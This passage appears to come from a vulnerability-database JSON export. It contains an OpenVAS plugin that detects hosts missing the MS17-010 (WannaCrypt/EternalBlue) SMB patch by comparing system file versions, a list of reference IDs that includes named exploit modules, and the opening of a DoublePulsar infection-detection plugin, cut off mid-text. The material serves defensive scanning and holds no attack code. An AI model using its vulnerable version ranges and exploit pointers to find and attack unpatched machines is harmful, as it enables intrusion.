"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin 
MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 x86\n\n Microsoft Windows 8 x86/x64\n\n Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, 
test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n 
exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2019-05-29T18:34:05"}], "viewCount": 5816, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", 
"THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-06-08T23:21:25", "rev": 2}, "score": {"value": 8.4, "vector": "NONE", "modified": "2020-06-08T23:21:25", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Service 
Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, 
file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n 
Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "OPENVAS:1361412562310810698", "hash": "7604514bf5cf58b6f0da40f51ee83e51", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2019-05-29T18:33:53", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "8d5fa3486aa9217e51225842c66de08a56e5899081dc72404f9f4fbca5e0c4e8", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2018-10-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2018-10-22T16:34:04", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"modified": "2018-10-22T16:34:04", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146"], "type": "cve"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["SMNTC-96709", "SMNTC-96707"], "type": "symantec"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_doublepulsar_infection_detect.nasl 11936 2018-10-17 09:05:37Z mmartin $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 11936 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 11:05:37 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID 
